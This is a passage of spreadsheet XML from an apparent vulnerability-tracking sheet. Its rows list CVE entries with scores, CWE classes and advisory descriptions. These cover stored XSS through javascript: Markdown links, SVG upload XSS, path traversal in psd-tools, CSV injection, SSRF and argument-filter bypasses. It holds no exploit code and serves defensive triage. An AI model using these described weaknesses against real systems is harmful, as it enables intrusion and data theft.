      <c r="M2172" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18741</t>
        </is>
      </c>
    </row>
    <row r="2173">
      <c r="A2173" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2173" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44401</t>
        </is>
      </c>
      <c r="C2173" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="D2173" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2173" s="5" t="inlineStr"/>
      <c r="F2173" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2173" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2173" s="5" t="inlineStr"/>
      <c r="I2173" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J2173" s="5" t="inlineStr"/>
      <c r="K2173" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2173" s="5" t="inlineStr">
        <is>
          <t>Typemill CMS version 2.x contains a persistent cross-site scripting vulnerability in the Markdown parser extension that allows authenticated users with theme-configuration access to inject malicious JavaScript URIs by supplying unsanitized href values in Markdown links. Attackers can craft Markdown links using the javascript: scheme through ParsedownExtension.php or TwigMarkdownExtension.php, storing a persistent payload that executes in the browser of every visitor who clicks the link, enabling session cookie theft, authenticated request forgery, and credential harvesting.</t>
        </is>
      </c>
      <c r="M2173" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44401</t>
        </is>
      </c>
    </row>
    <row r="2174">
      <c r="A2174" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2174" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49836</t>
        </is>
      </c>
      <c r="C2174" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="D2174" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2174" s="5" t="inlineStr"/>
      <c r="F2174" s="5" t="inlineStr"/>
      <c r="G2174" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2174" s="5" t="inlineStr"/>
      <c r="I2174" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2174" s="5" t="inlineStr"/>
      <c r="K2174" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73</t>
        </is>
      </c>
      <c r="L2174" s="5" t="inlineStr">
        <is>
          <t>psd-tools is a Python package for working with Adobe Photoshop PSD files. Prior to version 1.17.1, `SmartObject.save()` writes an embedded smart object to a path taken verbatim from the PSD file. Because that name is attacker-controlled and unsanitised, a tool that extracts embedded objects from an untrusted `.psd` can be made to write attacker-chosen bytes to an attacker-chosen path (absolute or `../`-traversing), outside its intended output directory. A secondary issue in `SmartObject.open()` for external-kind smart objects allows the attacker-controlled `fullPath` descriptor to be used as an arbitrary file read path, enabling exfiltration of the read content to the controlled write destination. Both issues are fixed in v1.17.1.</t>
        </is>
      </c>
      <c r="M2174" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49836</t>
        </is>
      </c>
    </row>
    <row r="2175">
      <c r="A2175" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2175" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61607</t>
        </is>
      </c>
      <c r="C2175" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="D2175" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2175" s="5" t="inlineStr"/>
      <c r="F2175" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2175" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2175" s="5" t="inlineStr"/>
      <c r="I2175" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J2175" s="5" t="inlineStr"/>
      <c r="K2175" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2175" s="5" t="inlineStr">
        <is>
          <t>Grav API Plugin is a RESTful API for Grav CMS that provides full headless access to your site's content. Prior to 1.0.2, the Grav API plugin POST /api/v1/media pipeline in HandlesMediaUploads::processUploadedFile() validates an SVG filename extension but does not invoke Security::sanitizeSVG(). An attacker with api.media.write permission can store an SVG containing JavaScript, and the server returns the file as Content-Type: image/svg+xml so the script executes when a victim opens it, allowing session data theft and authenticated actions. This issue is fixed in version 1.0.2.</t>
        </is>
      </c>
      <c r="M2175" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61607</t>
        </is>
      </c>
    </row>
    <row r="2176">
      <c r="A2176" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2176" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69381</t>
        </is>
      </c>
      <c r="C2176" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="D2176" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2176" s="5" t="inlineStr"/>
      <c r="F2176" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2176" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2176" s="5" t="inlineStr"/>
      <c r="I2176" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2176" s="5" t="inlineStr"/>
      <c r="K2176" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2176" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Storage Port Driver allows an unauthorized attacker to disclose information with a physical attack.</t>
        </is>
      </c>
      <c r="M2176" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69381</t>
        </is>
      </c>
    </row>
    <row r="2177">
      <c r="A2177" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2177" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69548</t>
        </is>
      </c>
      <c r="C2177" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="D2177" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2177" s="5" t="inlineStr"/>
      <c r="F2177" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2177" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2177" s="5" t="inlineStr"/>
      <c r="I2177" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2177" s="5" t="inlineStr"/>
      <c r="K2177" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2177" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows RNDIS allows an unauthorized attacker to disclose information with a physical attack.</t>
        </is>
      </c>
      <c r="M2177" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69548</t>
        </is>
      </c>
    </row>
    <row r="2178">
      <c r="A2178" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2178" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76959</t>
        </is>
      </c>
      <c r="C2178" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="D2178" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2178" s="5" t="inlineStr"/>
      <c r="F2178" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2178" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H2178" s="5" t="inlineStr"/>
      <c r="I2178" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2178" s="5" t="inlineStr"/>
      <c r="K2178" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L2178"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M2178" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76959</t>
        </is>
      </c>
    </row>
    <row r="2179">
      <c r="A2179" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2179" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78452</t>
        </is>
      </c>
      <c r="C2179" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="D2179" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2179" s="5" t="inlineStr"/>
      <c r="F2179" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2179" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2179" s="5" t="inlineStr"/>
      <c r="I2179" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2179" s="5" t="inlineStr"/>
      <c r="K2179" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2179" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Windows SCSI Class System File allows an unauthorized attacker to disclose information with a physical attack.</t>
        </is>
      </c>
      <c r="M2179" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78452</t>
        </is>
      </c>
    </row>
    <row r="2180">
      <c r="A2180" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2180" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78508</t>
        </is>
      </c>
      <c r="C2180" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="D2180" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2180" s="5" t="inlineStr"/>
      <c r="F2180" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2180" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H218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80" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2180" s="5" t="inlineStr"/>
      <c r="K2180" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2180" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows CD-ROM Driver allows an unauthorized attacker to disclose information with a physical attack.</t>
        </is>
      </c>
      <c r="M2180" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78508</t>
        </is>
      </c>
    </row>
    <row r="2181">
      <c r="A2181" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2181" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9852</t>
        </is>
      </c>
      <c r="C2181" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="D2181" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2181" s="5" t="inlineStr"/>
      <c r="F2181" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2181" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2181" s="5" t="inlineStr">
        <is>
          <t>hitachienergy:microscada_x_sys600</t>
        </is>
      </c>
      <c r="I2181" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J2181" s="5" t="inlineStr"/>
      <c r="K2181" s="5" t="inlineStr">
        <is>
          <t>CWE-1236</t>
        </is>
      </c>
      <c r="L2181" s="5" t="inlineStr">
        <is>
          <t>A CSV injection vulnerability exists in SYS600. Injected malicious formulas can add or modify data to the spreadsheet, insert links, exfiltrate data, and in some cases, depending on how the user has their environment configured, execute malicious code on the user’s machine. To exploit this issue attackers would need a way to create arbitrary log messages. This could be achieved through normal functionality via SCIL scripts, a log injection vulnerability, or via the SYS600 broker. This vulnerability affects all Windows users regardless of their privilege level who can run the Notify service and export the log.</t>
        </is>
      </c>
      <c r="M2181" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9852</t>
        </is>
      </c>
    </row>
    <row r="2182">
      <c r="A2182" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2182" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0296</t>
        </is>
      </c>
      <c r="C2182" s="5" t="n">
        <v>4.5</v>
      </c>
      <c r="D2182" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2182" s="5" t="inlineStr"/>
      <c r="F2182" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2182" s="5" t="inlineStr">
        <is>
          <t>palo alto</t>
        </is>
      </c>
      <c r="H2182" s="5" t="inlineStr">
        <is>
          <t>paloaltonetworks:globalprotect</t>
        </is>
      </c>
      <c r="I2182" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J2182" s="5" t="inlineStr"/>
      <c r="K2182" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L2182" s="5" t="inlineStr">
        <is>
          <t>Improper certificate validation vulnerabilities in Palo Alto Networks GlobalProtect™ app enable an unauthenticated attacker with man-in-the-middle (MitM) access to intercept and modify application communications. VPN tunnel traffic is not impacted.
The GlobalProtect app on iOS, Android, and Chrome OS is not affected.</t>
        </is>
      </c>
      <c r="M2182" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0296</t>
        </is>
      </c>
    </row>
    <row r="2183">
      <c r="A2183" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2183" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18073</t>
        </is>
      </c>
      <c r="C2183" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="D2183" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2183" s="5" t="inlineStr"/>
      <c r="F2183" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2183" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H2183" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I2183" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2183" s="5" t="inlineStr"/>
      <c r="K2183" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L2183" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a local authenticated attacker to inject parameters into a CL command due to improper neutralization of special elements.</t>
        </is>
      </c>
      <c r="M2183" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18073</t>
        </is>
      </c>
    </row>
    <row r="2184">
      <c r="A2184" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2184" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69713</t>
        </is>
      </c>
      <c r="C2184" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="D2184" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2184" s="5" t="inlineStr"/>
      <c r="F2184" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2184" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2184" s="5" t="inlineStr"/>
      <c r="I2184" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2184" s="5" t="inlineStr"/>
      <c r="K2184" s="5" t="inlineStr"/>
      <c r="L2184" s="5" t="inlineStr">
        <is>
          <t>Dependency on vulnerable third-party component in Windows Secure Boot allows an authorized attacker to bypass a security feature locally.</t>
        </is>
      </c>
      <c r="M2184" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69713</t>
        </is>
      </c>
    </row>
    <row r="2185">
      <c r="A2185" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2185" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72980</t>
        </is>
      </c>
      <c r="C2185" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="D2185" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2185" s="5" t="inlineStr"/>
      <c r="F2185" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2185" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2185" s="5" t="inlineStr"/>
      <c r="I2185" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2185" s="5" t="inlineStr"/>
      <c r="K2185" s="5" t="inlineStr">
        <is>
          <t>CWE-427</t>
        </is>
      </c>
      <c r="L2185" s="5" t="inlineStr">
        <is>
          <t>Uncontrolled search path element in Windows Hello allows an authorized attacker to bypass a security feature locally.</t>
        </is>
      </c>
      <c r="M2185" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72980</t>
        </is>
      </c>
    </row>
    <row r="2186">
      <c r="A2186" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2186" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0305</t>
        </is>
      </c>
      <c r="C2186" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D2186" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2186" s="5" t="inlineStr"/>
      <c r="F2186" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2186" s="5" t="inlineStr">
        <is>
          <t>windows, palo alto</t>
        </is>
      </c>
      <c r="H2186" s="5" t="inlineStr"/>
      <c r="I2186" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2186" s="5" t="inlineStr"/>
      <c r="K2186" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L2186" s="5" t="inlineStr">
        <is>
          <t>An information disclosure vulnerability in the Palo Alto Networks Prisma® Access Agent on Linux enables a local user to access sensitive configuration data and credentials.
The Prisma Access Agent on macOS, Windows, iOS, Android and Chrome OS is not affected.</t>
        </is>
      </c>
      <c r="M2186" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0305</t>
        </is>
      </c>
    </row>
    <row r="2187">
      <c r="A2187" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2187" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16941</t>
        </is>
      </c>
      <c r="C2187" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D2187" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2187" s="5" t="inlineStr"/>
      <c r="F2187" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2187" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H2187" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I2187" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2187" s="5" t="inlineStr"/>
      <c r="K2187" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L2187" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, and 7.4 could allow a remote authenticated attacker to modify certain system messages due to improper authorization.</t>
        </is>
      </c>
      <c r="M2187" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16941</t>
        </is>
      </c>
    </row>
    <row r="2188">
      <c r="A2188" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2188" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52730</t>
        </is>
      </c>
      <c r="C2188" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D2188" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2188" s="5" t="inlineStr"/>
      <c r="F2188" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2188" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2188" s="5" t="inlineStr"/>
      <c r="I2188" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J2188" s="5" t="inlineStr"/>
      <c r="K2188" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2188" s="5" t="inlineStr">
        <is>
          <t>Xibo is an open source digital signage platform with a web content management system and Windows display player software. Prior to 4.4.3, missing Authorization in Module::settingsForm allows to view (not change) super admin-restricted module settings and leak the full module entity. Exploitation of the vulnerability is possible on behalf of an authorized user who has access to the Module View feature, which are not granted to non-admins as standard. Users should upgrade to version 4.4.3 which fixes this issue. Upgrading to a fixed version is necessary to remediate. Users unable to upgrade should revoke such privileges from users they do not trust.</t>
        </is>
      </c>
      <c r="M2188" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52730</t>
        </is>
      </c>
    </row>
    <row r="2189">
      <c r="A2189" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2189" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53487</t>
        </is>
      </c>
      <c r="C2189" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D2189" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2189" s="5" t="inlineStr"/>
      <c r="F2189" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2189" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H2189" s="5" t="inlineStr"/>
      <c r="I2189" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J2189" s="5" t="inlineStr"/>
      <c r="K2189" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2189" s="5" t="inlineStr">
        <is>
          <t>Kite is a Kubernetes dashboard. Prior to version 0.12.3, authenticated Kite users with any role can request `/api/v1/overview` for a cluster that their roles do not permit by selecting that cluster with `x-cluster-name`. The overview route is registered before `middleware.RBACMiddleware()` and `GetOverview` only checks `len(user.Roles) &gt; 0`, so it returns aggregate Kubernetes inventory and capacity data from unauthorized clusters. Version 0.12.3 fixes the issue.</t>
        </is>
      </c>
      <c r="M2189" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53487</t>
        </is>
      </c>
    </row>
    <row r="2190">
      <c r="A2190" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2190" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53541</t>
        </is>
      </c>
      <c r="C2190" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D2190" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2190" s="5" t="inlineStr"/>
      <c r="F2190" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2190" s="5" t="inlineStr">
        <is>
          <t>db2</t>
        </is>
      </c>
      <c r="H2190" s="5" t="inlineStr"/>
      <c r="I2190" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J2190" s="5" t="inlineStr"/>
      <c r="K2190" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L2190" s="5" t="inlineStr">
        <is>
          <t>OliveTin gives access to predefined shell commands from a web interface. The `filterToDefinedArgumentsOnly` function in the executor is intended to discard any arguments not explicitly defined in the action's configuration. However, prior to commit ebffd9f040f791208aee1db2e5a8aecd1e3e603d, a special case allows any argument whose name starts with `ot_` to bypass this filter. While two system arguments (`ot_executionTrackingId` and `ot_username`) are injected by OliveTin and overridden, all other `ot_`-prefixed arguments supplied by the user pass through unmodified. These bypassed arguments are not type-checked — the validation loop only iterates over the action's defined arguments, so `ot_`-prefixed arguments skip all type safety checks entirely; set as environment variables — via `buildEnv()`, with completely unvalidated values, and passed to the executed command; and included in the template context — available as `.Arguments.ot_*` in template rendering. Commit ebffd9f040f791208aee1db2e5a8aecd1e3e603d contains a patch.</t>
        </is>
      </c>
      <c r="M2190" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53541</t>
        </is>
      </c>
    </row>
    <row r="2191">
      <c r="A2191" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2191" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54492</t>
        </is>
      </c>
      <c r="C2191" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D2191" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2191" s="5" t="inlineStr"/>
      <c r="F2191" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2191" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H2191" s="5" t="inlineStr"/>
      <c r="I2191" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J2191" s="5" t="inlineStr"/>
      <c r="K2191" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2191" s="5" t="inlineStr">
        <is>
          <t>Koel is a free, open-source music streaming solution. Prior to 9.7.0, the Subsonic-compatible createPodcastChannel.view route accepts an authenticated user's private URL because app/Http/Requests/Subsonic/CreatePodcastChannelRequest.php does not apply the SafeUrl validation used by the regular podcast API. app/Http/Controllers/Subsonic/CreatePodcastChannelController.php passes the URL to app/Services/Podcast/PodcastService.php, where PodcastService::addPodcast() and createParser() invoke Poddle::fromUrl() during channel creation, causing immediate server-side requests to loopback, Docker bridge, or RFC1918 HTTP destinations. The confirmed impact is blind internal request execution because generic response-body exfiltration was not demonstrated through this route. This issue is fixed in version 9.7.0.</t>
        </is>
      </c>
      <c r="M2191" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54492</t>
        </is>
      </c>
    </row>
    <row r="2192">
      <c r="A2192" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2192" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55547</t>
        </is>
      </c>
      <c r="C2192" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D2192" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2192" s="5" t="inlineStr"/>
      <c r="F2192" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2192" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2192" s="5" t="inlineStr"/>
      <c r="I2192" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2192" s="5" t="inlineStr"/>
      <c r="K2192" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-862</t>
        </is>
      </c>
      <c r="L2192" s="5" t="inlineStr">
        <is>
          <t>Yamcs is a mission control framework. Prior to 5.12.8 and 5.13.2, Yamcs omits SystemPrivilege.ControlAccess checks from IamApi.listRoles, IamApi.getRole, and IamApi.listPrivileges in yamcs-core/src/main/java/org/yamcs/http/api/IamApi.java. Any authenticated account can call GET /api/roles, GET /api/roles/{name}, and GET /api/privileges to enumerate available system privileges and configured role mappings. The disclosure reveals security configuration that can support targeted privilege-escalation attempts. This issue is fixed in versions 5.12.8 and 5.13.2.</t>
        </is>
      </c>
      <c r="M2192" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55547</t>
        </is>
      </c>
    </row>
    <row r="2193">
      <c r="A2193" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2193" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55566</t>
        </is>
      </c>
      <c r="C2193" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D2193" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2193" s="5" t="inlineStr"/>
      <c r="F2193" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2193" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2193" s="5" t="inlineStr"/>
      <c r="I2193" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2193" s="5" t="inlineStr"/>
      <c r="K2193" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2193" s="5" t="inlineStr">
        <is>
